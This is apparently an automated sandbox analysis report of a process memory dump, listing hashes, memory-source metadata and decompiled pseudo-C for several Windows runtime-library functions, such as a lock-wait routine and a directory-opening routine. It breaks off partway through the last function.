                        0x02bcfb72
                        0x02bcfb5e
                        0x02bcfc8d
                        0x02bcfc91
                        0x02bcfadf
                        0x02bcfadf
                        0x02bcfae1
                        0x02bcfae4
                        0x02bcfae7
                        0x02bcfaec
                        0x02bcfaf8
                        0x02bcfb00
                        0x02bcfb07
                        0x02bcfb0f
                        0x02bcfb0f
                        0x02bcfb07
                        0x00000000
                        0x02bcfaf8
                        0x02bcfadd

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02C0BE0F
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: a32d362633de533b4cee689faf5a9190fe2480f6bd34aa238122fe5b7e8c5692
                        • Instruction ID: a8af5cab4086b7cb8968ad556f31d2b432f99ebe154b3ae2d4ae45c2ba51626e
                        • Opcode Fuzzy Hash: a32d362633de533b4cee689faf5a9190fe2480f6bd34aa238122fe5b7e8c5692
                        • Instruction Fuzzy Hash: 4AA1F371B006469BDB25DF68C490B7AB3A6EF48718F2445EEE916DBA80DB30DD41CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 63%
                        			E02B92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                        				signed char _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				signed int _v52;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t55;
                        				signed int _t57;
                        				signed int _t58;
                        				char* _t62;
                        				signed char* _t63;
                        				signed char* _t64;
                        				signed int _t67;
                        				signed int _t72;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t88;
                        				intOrPtr _t89;
                        				signed char _t93;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t102;
                        				signed int _t103;
                        				intOrPtr _t104;
                        				signed int _t105;
                        				signed int _t106;
                        				signed char _t109;
                        				signed int _t111;
                        				void* _t116;
                        
                        				_t102 = __edi;
                        				_t97 = __edx;
                        				_v12 = _v12 & 0x00000000;
                        				_t55 =  *[fs:0x18];
                        				_t109 = __ecx;
                        				_v8 = __edx;
                        				_t86 = 0;
                        				_v32 = _t55;
                        				_v24 = 0;
                        				_push(__edi);
                        				if(__ecx == 0x2c85350) {
                        					_t86 = 1;
                        					_v24 = 1;
                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                        				}
                        				_t103 = _t102 | 0xffffffff;
                        				if( *0x2c87bc8 != 0) {
                        					_push(0xc000004b);
                        					_push(_t103);
                        					E02BD97C0();
                        				}
                        				if( *0x2c879c4 != 0) {
                        					_t57 = 0;
                        				} else {
                        					_t57 = 0x2c879c8;
                        				}
                        				_v16 = _t57;
                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                        					_t93 = _t109;
                        					L23();
                        				}
                        				_t58 =  *_t109;
                        				if(_t58 == _t103) {
                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                        					_t58 = _t103;
                        					if(__eflags == 0) {
                        						_t93 = _t109;
                        						E02BC1624(_t86, __eflags);
                        						_t58 =  *_t109;
                        					}
                        				}
                        				_v20 = _v20 & 0x00000000;
                        				if(_t58 != _t103) {
                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                        				}
                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                        				_t88 = _v16;
                        				_v28 = _t104;
                        				L9:
                        				while(1) {
                        					if(E02BB7D50() != 0) {
                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                        					} else {
                        						_t62 = 0x7ffe0382;
                        					}
                        					if( *_t62 != 0) {
                        						_t63 =  *[fs:0x30];
                        						__eflags = _t63[0x240] & 0x00000002;
                        						if((_t63[0x240] & 0x00000002) != 0) {
                        							_t93 = _t109;
                        							E02C2FE87(_t93);
                        						}
                        					}
                        					if(_t104 != 0xffffffff) {
                        						_push(_t88);
                        						_push(0);
                        						_push(_t104);
                        						_t64 = E02BD9520();
                        						goto L15;
                        					} else {
                        						while(1) {
                        							_t97 =  &_v8;
                        							_t64 = E02BCE18B(_t109 + 4, _t97, 4, _t88, 0);
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t93 =  *(_t109 + 4);
                        							_v8 = _t93;
                        							if((_t93 & 0x00000002) != 0) {
                        								continue;
                        							}
                        							L15:
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t89 = _v24;
                        							if(_t64 < 0) {
                        								L02BEDF30(_t93, _t97, _t64);
                        								_push(_t93);
                        								_t98 = _t97 | 0xffffffff;
                        								__eflags =  *0x2c86901;
                        								_push(_t109);
                        								_v52 = _t98;
                        								if( *0x2c86901 != 0) {
                        									_push(0);
                        									_push(1);
                        									_push(0);
                        									_push(0x100003);
                        									_push( &_v12);
                        									_t72 = E02BD9980();
                        									__eflags = _t72;
                        									if(_t72 < 0) {
                        										_v12 = _t98 | 0xffffffff;
                        									}
                        								}
                        								asm("lock cmpxchg [ecx], edx");
                        								_t111 = 0;
                        								__eflags = 0;
                        								if(0 != 0) {
                        									__eflags = _v12 - 0xffffffff;
                        									if(_v12 != 0xffffffff) {
                        										_push(_v12);
                        										E02BD95D0();
                        									}
                        								} else {
                        									_t111 = _v12;
                        								}
                        								return _t111;
                        							} else {
                        								if(_t89 != 0) {
                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                        									_t77 = E02BB7D50();
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										_t64 = 0x7ffe0384;
                        									} else {
                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                        									}
                        									__eflags =  *_t64;
                        									if( *_t64 != 0) {
                        										_t64 =  *[fs:0x30];
                        										__eflags = _t64[0x240] & 0x00000004;
                        										if((_t64[0x240] & 0x00000004) != 0) {
                        											_t78 = E02BB7D50();
                        											__eflags = _t78;
                        											if(_t78 == 0) {
                        												_t64 = 0x7ffe0385;
                        											} else {
                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                        											}
                        											__eflags =  *_t64 & 0x00000020;
                        											if(( *_t64 & 0x00000020) != 0) {
                        												_t64 = E02C17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                        											}
                        										}
                        									}
                        								}
                        								return _t64;
                        							}
                        						}
                        						_t97 = _t88;
                        						_t93 = _t109;
                        						E02C2FDDA(_t97, _v12);
                        						_t105 =  *_t109;
                        						_t67 = _v12 + 1;
                        						_v12 = _t67;
                        						__eflags = _t105 - 0xffffffff;
                        						if(_t105 == 0xffffffff) {
                        							_t106 = 0;
                        							__eflags = 0;
                        						} else {
                        							_t106 =  *(_t105 + 0x14);
                        						}
                        						__eflags = _t67 - 2;
                        						if(_t67 > 2) {
                        							__eflags = _t109 - 0x2c85350;
                        							if(_t109 != 0x2c85350) {
                        								__eflags = _t106 - _v20;
                        								if(__eflags == 0) {
                        									_t93 = _t109;
                        									E02C2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                        								}
                        							}
                        						}
                        						_push("RTL: Re-Waiting\n");
                        						_push(0);
                        						_push(0x65);
                        						_v20 = _t106;
                        						E02C25720();
                        						_t104 = _v28;
                        						_t116 = _t116 + 0xc;
                        						continue;
                        					}
                        				}
                        			}




































                        0x02b92d8a
                        0x02b92d8a
                        0x02b92d92
                        0x02b92d96
                        0x02b92d9e
                        0x02b92da0
                        0x02b92da3
                        0x02b92da5
                        0x02b92da8
                        0x02b92dab
                        0x02b92db2
                        0x02bef9aa
                        0x02bef9ab
                        0x02bef9ae
                        0x02bef9ae
                        0x02b92db8
                        0x02b92dc2
                        0x02bef9b9
                        0x02bef9be
                        0x02bef9bf
                        0x02bef9bf
                        0x02b92dcf
                        0x02bef9c9
                        0x02b92dd5
                        0x02b92dd5
                        0x02b92dd5
                        0x02b92dde
                        0x02b92de1
                        0x02b92e70
                        0x02b92e72
                        0x02b92e72
                        0x02b92de7
                        0x02b92deb
                        0x02b92e7c
                        0x02b92e83
                        0x02b92e85
                        0x02b92e8b
                        0x02b92e8d
                        0x02b92e92
                        0x02b92e92
                        0x02b92e85
                        0x02b92df1
                        0x02b92df7
                        0x02b92df9
                        0x02b92df9
                        0x02b92dfc
                        0x02b92dff
                        0x02b92e02
                        0x00000000
                        0x02b92e05
                        0x02b92e0c
                        0x02bef9d9
                        0x02b92e12
                        0x02b92e12
                        0x02b92e12
                        0x02b92e1a
                        0x02bef9e3
                        0x02bef9e9
                        0x02bef9f0
                        0x02bef9f6
                        0x02bef9f8
                        0x02bef9f8
                        0x02bef9f0
                        0x02b92e23
                        0x02befa02
                        0x02befa03
                        0x02befa05
                        0x02befa06
                        0x00000000
                        0x02b92e29
                        0x02b92e29
                        0x02b92e2e
                        0x02b92e34
                        0x02b92e3e
                        0x00000000
                        0x00000000
                        0x02b92e44
                        0x02b92e47
                        0x02b92e4d
                        0x00000000
                        0x00000000
                        0x02b92e4f
                        0x02b92e54
                        0x00000000
                        0x00000000
                        0x02b92e5a
                        0x02b92e5f
                        0x02b92e9a
                        0x02b92ea4
                        0x02b92ea5
                        0x02b92ea8
                        0x02b92eaf
                        0x02b92eb2
                        0x02b92eb5
                        0x02befae9
                        0x02befaeb
                        0x02befaed
                        0x02befaef
                        0x02befaf7
                        0x02befaf8
                        0x02befafd
                        0x02befaff
                        0x02befb04
                        0x02befb04
                        0x02befaff
                        0x02b92ec0
                        0x02b92ec4
                        0x02b92ec6
                        0x02b92ec8
                        0x02befb14
                        0x02befb18
                        0x02befb1e
                        0x02befb21
                        0x02befb21
                        0x02b92ece
                        0x02b92ece
                        0x02b92ece
                        0x02b92ed7
                        0x02b92e61
                        0x02b92e63
                        0x02befa6b
                        0x02befa71
                        0x02befa76
                        0x02befa78
                        0x02befa8a
                        0x02befa7a
                        0x02befa83
                        0x02befa83
                        0x02befa8f
                        0x02befa91
                        0x02befa97
                        0x02befa9d
                        0x02befaa4
                        0x02befaaa
                        0x02befaaf
                        0x02befab1
                        0x02befac3
                        0x02befab3
                        0x02befabc
                        0x02befabc
                        0x02befac8
                        0x02befacb
                        0x02befadf
                        0x02befadf
                        0x02befacb
                        0x02befaa4
                        0x02befa91
                        0x02b92e6f
                        0x02b92e6f
                        0x02b92e5f
                        0x02befa13
                        0x02befa15
                        0x02befa17
                        0x02befa1f
                        0x02befa21
                        0x02befa22
                        0x02befa25
                        0x02befa28
                        0x02befa2f
                        0x02befa2f
                        0x02befa2a
                        0x02befa2a
                        0x02befa2a
                        0x02befa31
                        0x02befa34
                        0x02befa36
                        0x02befa3c
                        0x02befa3e
                        0x02befa41
                        0x02befa43
                        0x02befa45
                        0x02befa45
                        0x02befa41
                        0x02befa3c
                        0x02befa4a
                        0x02befa4f
                        0x02befa51
                        0x02befa53
                        0x02befa56
                        0x02befa5b
                        0x02befa5e
                        0x00000000
                        0x02befa5e
                        0x02b92e23

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: 1d2964b354897bf4cfda3a5a3be4e0af134c302c5dfdf08fb6173f5defed3e3f
                        • Instruction ID: d6f45bf05e0eb7056aa12c9ad05d8eeb88e2ecad487c994f91ada2f62c3c50c3
                        • Opcode Fuzzy Hash: 1d2964b354897bf4cfda3a5a3be4e0af134c302c5dfdf08fb6173f5defed3e3f
                        • Instruction Fuzzy Hash: 5D611471E00A44ABDF21DF68C880B7EB7B9EF44714F1446EAD8629B6D0DB749940CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02C60EA5(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				unsigned int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				char _v44;
                        				intOrPtr _v64;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t58;
                        				unsigned int _t60;
                        				intOrPtr _t62;
                        				char* _t67;
                        				char* _t69;
                        				void* _t80;
                        				void* _t83;
                        				intOrPtr _t93;
                        				intOrPtr _t115;
                        				char _t117;
                        				void* _t120;
                        
                        				_t83 = __edx;
                        				_t117 = 0;
                        				_t120 = __ecx;
                        				_v44 = 0;
                        				if(E02C5FF69(__ecx,  &_v44,  &_v32) < 0) {
                        					L24:
                        					_t109 = _v44;
                        					if(_v44 != 0) {
                        						E02C61074(_t83, _t120, _t109, _t117, _t117);
                        					}
                        					L26:
                        					return _t117;
                        				}
                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                        				_t5 = _t83 + 1; // 0x1
                        				_v36 = _t5 << 0xc;
                        				_v40 = _t93;
                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                        				asm("sbb ebx, ebx");
                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                        				if(_t58 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t93);
                        					_push(0xffffffff);
                        					_t80 = E02BD9730();
                        					_t115 = _v64;
                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                        						_push(_t93);
                        						E02C5A80D(_t115, 1, _v20, _t117);
                        						_t83 = 4;
                        					}
                        				}
                        				if(E02C5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                        					goto L24;
                        				}
                        				_t60 = _v32;
                        				_t97 = (_t60 != 0x100000) + 1;
                        				_t83 = (_v44 -  *0x2c88b04 >> 0x14) + (_v44 -  *0x2c88b04 >> 0x14);
                        				_v28 = (_t60 != 0x100000) + 1;
                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                        				_v40 = _t62;
                        				if(_t83 >= _t62) {
                        					L10:
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					if(E02BB7D50() == 0) {
                        						_t67 = 0x7ffe0380;
                        					} else {
                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E02C5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                        					}
                        					if(E02BB7D50() == 0) {
                        						_t69 = 0x7ffe0388;
                        					} else {
                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t69 != 0) {
                        						E02C4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                        					}
                        					if(( *0x2c88724 & 0x00000008) != 0) {
                        						E02C552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                        					}
                        					_t117 = _v44;
                        					goto L26;
                        				}
                        				while(E02C615B5(0x2c88ae4, _t83, _t97, _t97) >= 0) {
                        					_t97 = _v28;
                        					_t83 = _t83 + 2;
                        					if(_t83 < _v40) {
                        						continue;
                        					}
                        					goto L10;
                        				}
                        				goto L24;
                        			}
























                        0x02c60eb7
                        0x02c60eb9
                        0x02c60ec0
                        0x02c60ec2
                        0x02c60ecd
                        0x02c6105b
                        0x02c6105b
                        0x02c61061
                        0x02c61066
                        0x02c61066
                        0x02c6106b
                        0x02c61073
                        0x02c61073
                        0x02c60ed3
                        0x02c60ed6
                        0x02c60edc
                        0x02c60ee0
                        0x02c60ee7
                        0x02c60ef0
                        0x02c60ef5
                        0x02c60efa
                        0x02c60efc
                        0x02c60efd
                        0x02c60f03
                        0x02c60f04
                        0x02c60f06
                        0x02c60f07
                        0x02c60f09
                        0x02c60f0e
                        0x02c60f14
                        0x02c60f23
                        0x02c60f2d
                        0x02c60f34
                        0x02c60f34
                        0x02c60f14
                        0x02c60f52
                        0x00000000
                        0x00000000
                        0x02c60f58
                        0x02c60f73
                        0x02c60f74
                        0x02c60f79
                        0x02c60f7d
                        0x02c60f80
                        0x02c60f86
                        0x02c60fab
                        0x02c60fb5
                        0x02c60fc6
                        0x02c60fd1
                        0x02c60fe3
                        0x02c60fd3
                        0x02c60fdc
                        0x02c60fdc
                        0x02c60feb
                        0x02c61009
                        0x02c61009
                        0x02c61015
                        0x02c61027
                        0x02c61017
                        0x02c61020
                        0x02c61020
                        0x02c6102f
                        0x02c6103c
                        0x02c6103c
                        0x02c61048
                        0x02c61050
                        0x02c61050
                        0x02c61055
                        0x00000000
                        0x02c61055
                        0x02c60f88
                        0x02c60f9e
                        0x02c60fa2
                        0x02c60fa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c60fa9
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: e0d9012e536316703ed30e69ce48ad15225a94522b553dcbc6df85d1690f3d04
                        • Instruction ID: caa3bc52a756f1689c142d7387efa03875b3b669c4c2f2bdb0b1a247a8402c76
                        • Opcode Fuzzy Hash: e0d9012e536316703ed30e69ce48ad15225a94522b553dcbc6df85d1690f3d04
                        • Instruction Fuzzy Hash: 5951AF712043819FD714DF19D9C8B2BB7E6EBC4304F084A2CF946A7290D771E946CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E02BCF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				char* _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v44;
                        				char _v52;
                        				intOrPtr _v56;
                        				char _v60;
                        				intOrPtr _v72;
                        				void* _t51;
                        				void* _t58;
                        				signed short _t82;
                        				short _t84;
                        				signed int _t91;
                        				signed int _t100;
                        				signed short* _t103;
                        				void* _t108;
                        				intOrPtr* _t109;
                        
                        				_t103 = __ecx;
                        				_t82 = __edx;
                        				_t51 = E02BB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                        				if(_t51 >= 0) {
                        					_push(0x21);
                        					_push(3);
                        					_v56 =  *0x7ffe02dc;
                        					_v20 =  &_v52;
                        					_push( &_v44);
                        					_v28 = 0x18;
                        					_push( &_v28);
                        					_push(0x100020);
                        					_v24 = 0;
                        					_push( &_v60);
                        					_v16 = 0x40;
                        					_v12 = 0;
                        					_v8 = 0;
                        					_t58 = E02BD9830();
                        					_t87 =  *[fs:0x30];
                        					_t108 = _t58;
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                        					if(_t108 < 0) {
                        						L11:
                        						_t51 = _t108;
                        					} else {
                        						_push(4);
                        						_push(8);
                        						_push( &_v36);
                        						_push( &_v44);
                        						_push(_v60);
                        						_t108 = E02BD9990();
                        						if(_t108 < 0) {
                        							L10:
                        							_push(_v60);
                        							E02BD95D0();
                        							goto L11;
                        						} else {
                        							_t109 = L02BB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                        							if(_t109 == 0) {
                        								_t108 = 0xc0000017;
                        								goto L10;
                        							} else {
                        								_t21 = _t109 + 0x18; // 0x18
                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                        								 *_t109 = 1;
                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                        								 *(_t109 + 0xe) = _t82;
                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                        								E02BDF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                        								_t91 =  *_t103 & 0x0000ffff;
                        								_t100 = _t91 & 0xfffffffe;
                        								_t84 = 0x5c;
                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                        										_push(_v60);
                        										E02BD95D0();
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                        										_t51 = 0xc0000106;
                        									} else {
                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                        										goto L5;
                        									}
                        								} else {
                        									L5:
                        									 *_a4 = _t109;
                        									_t51 = 0;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t51;
                        			}

























                        0x02bcf0d3
                        0x02bcf0d9
                        0x02bcf0e0
                        0x02bcf0e7
                        0x02bcf0f2
                        0x02bcf0f4
                        0x02bcf0f8
                        0x02bcf100
                        0x02bcf108
                        0x02bcf10d
                        0x02bcf115
                        0x02bcf116
                        0x02bcf11f
                        0x02bcf123
                        0x02bcf124
                        0x02bcf12c
                        0x02bcf130
                        0x02bcf134
                        0x02bcf13d
                        0x02bcf144
                        0x02bcf14b
                        0x02bcf152
                        0x02c0bab0
                        0x02c0bab0
                        0x02bcf158
                        0x02bcf158
                        0x02bcf15a
                        0x02bcf160
                        0x02bcf165
                        0x02bcf166
                        0x02bcf16f
                        0x02bcf173
                        0x02c0baa7
                        0x02c0baa7
                        0x02c0baab
                        0x00000000
                        0x02bcf179
                        0x02bcf18d
                        0x02bcf191
                        0x02c0baa2
                        0x00000000
                        0x02bcf197
                        0x02bcf19b
                        0x02bcf1a2
                        0x02bcf1a9
                        0x02bcf1af
                        0x02bcf1b2
                        0x02bcf1b6
                        0x02bcf1b9
                        0x02bcf1c4
                        0x02bcf1d8
                        0x02bcf1df
                        0x02bcf1e3
                        0x02bcf1eb
                        0x02bcf1ee
                        0x02bcf1f4
                        0x02bcf20f
                        0x02c0bab7
                        0x02c0babb
                        0x02c0bacc
                        0x02c0bad1
                        0x02bcf215
                        0x02bcf218
                        0x02bcf226
                        0x02bcf22b
                        0x00000000
                        0x02bcf22b
                        0x02bcf1f6
                        0x02bcf1f6
                        0x02bcf1f9
                        0x02bcf1fb
                        0x02bcf1fb
                        0x02bcf1f4
                        0x02bcf191
                        0x02bcf173
                        0x02bcf152
                        0x02bcf203

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: e8e9bfe74170fa5d1465001db390f6281988314b72ba33e08f851549d6d6bb29
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 9B517C71504710AFC321DF29C840A6BBBF9FF88714F108A6EF99597690E7B4E944CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E02C13540(intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				char _v96;
                        				char _v352;
                        				char _v1072;
                        				intOrPtr _v1140;
                        				intOrPtr _v1148;
                        				char _v1152;
                        				char _v1156;
                        				char _v1160;
                        				char _v1164;
                        				char _v1168;
                        				char* _v1172;
                        				short _v1174;
                        				char _v1176;
                        				char _v1180;
                        				char _v1192;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				short _t41;
                        				short _t42;
                        				intOrPtr _t80;
                        				intOrPtr _t81;
                        				signed int _t82;
                        				void* _t83;
                        
                        				_v12 =  *0x2c8d360 ^ _t82;
                        				_t41 = 0x14;
                        				_v1176 = _t41;
                        				_t42 = 0x16;
                        				_v1174 = _t42;
                        				_v1164 = 0x100;
                        				_v1172 = L"BinaryHash";
                        				_t81 = E02BD0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                        				if(_t81 < 0) {
                        					L11:
                        					_t75 = _t81;
                        					E02C13706(0, _t81, _t79, _t80);
                        					L12:
                        					if(_a4 != 0xc000047f) {
                        						E02BDFA60( &_v1152, 0, 0x50);
                        						_v1152 = 0x60c201e;
                        						_v1148 = 1;
                        						_v1140 = E02C13540;
                        						E02BDFA60( &_v1072, 0, 0x2cc);
                        						_push( &_v1072);
                        						E02BEDDD0( &_v1072, _t75, _t79, _t80, _t81);
                        						E02C20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                        						_push(_v1152);
                        						_push(0xffffffff);
                        						E02BD97C0();
                        					}
                        					return E02BDB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                        				}
                        				_t79 =  &_v352;
                        				_t81 = E02C13971(0, _a4,  &_v352,  &_v1156);
                        				if(_t81 < 0) {
                        					goto L11;
                        				}
                        				_t75 = _v1156;
                        				_t79 =  &_v1160;
                        				_t81 = E02C13884(_v1156,  &_v1160,  &_v1168);
                        				if(_t81 >= 0) {
                        					_t80 = _v1160;
                        					E02BDFA60( &_v96, 0, 0x50);
                        					_t83 = _t83 + 0xc;
                        					_push( &_v1180);
                        					_push(0x50);
                        					_push( &_v96);
                        					_push(2);
                        					_push( &_v1176);
                        					_push(_v1156);
                        					_t81 = E02BD9650();
                        					if(_t81 >= 0) {
                        						if(_v92 != 3 || _v88 == 0) {
                        							_t81 = 0xc000090b;
                        						}
                        						if(_t81 >= 0) {
                        							_t75 = _a4;
                        							_t79 =  &_v352;
                        							E02C13787(_a4,  &_v352, _t80);
                        						}
                        					}
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                        				}
                        				_push(_v1156);
                        				E02BD95D0();
                        				if(_t81 >= 0) {
                        					goto L12;
                        				} else {
                        					goto L11;
                        				}
                        			}































                        0x02c13552
                        0x02c1355a
                        0x02c1355d
                        0x02c13566
                        0x02c13567
                        0x02c1357e
                        0x02c1358f
                        0x02c135a1
                        0x02c135a5
                        0x02c1366b
                        0x02c1366b
                        0x02c1366d
                        0x02c13672
                        0x02c13679
                        0x02c13685
                        0x02c1368d
                        0x02c1369d
                        0x02c136a7
                        0x02c136b8
                        0x02c136c6
                        0x02c136c7
                        0x02c136dc
                        0x02c136e1
                        0x02c136e7
                        0x02c136e9
                        0x02c136e9
                        0x02c13703
                        0x02c13703
                        0x02c135b5
                        0x02c135c0
                        0x02c135c4
                        0x00000000
                        0x00000000
                        0x02c135ca
                        0x02c135d7
                        0x02c135e2
                        0x02c135e6
                        0x02c135e8
                        0x02c135f5
                        0x02c135fa
                        0x02c13603
                        0x02c13604
                        0x02c13609
                        0x02c1360a
                        0x02c13612
                        0x02c13613
                        0x02c1361e
                        0x02c13622
                        0x02c13628
                        0x02c1362f
                        0x02c1362f
                        0x02c13636
                        0x02c13638
                        0x02c1363b
                        0x02c13642
                        0x02c13642
                        0x02c13636
                        0x02c13657
                        0x02c13657
                        0x02c1365c
                        0x02c13662
                        0x02c13669
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: BinaryHash
                        • API String ID: 0-2202222882
                        • Opcode ID: cdd07ece66bd58b221428c5cb621bf4f3ee21c029bac725dafe9e54bf8b899e1
                        • Instruction ID: 082c5fec602d815b42dfe19fefc66329f271bf30c40d40604bd216d764e60ac1
                        • Opcode Fuzzy Hash: cdd07ece66bd58b221428c5cb621bf4f3ee21c029bac725dafe9e54bf8b899e1
                        • Instruction Fuzzy Hash: C34164F2D0056C9BDB21DA50CC85FEEB77DAB45718F0045E5EA09AB240EB309E89DF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E02C605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v28;
                        				char _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				void* __ebx;
                        				void* _t35;
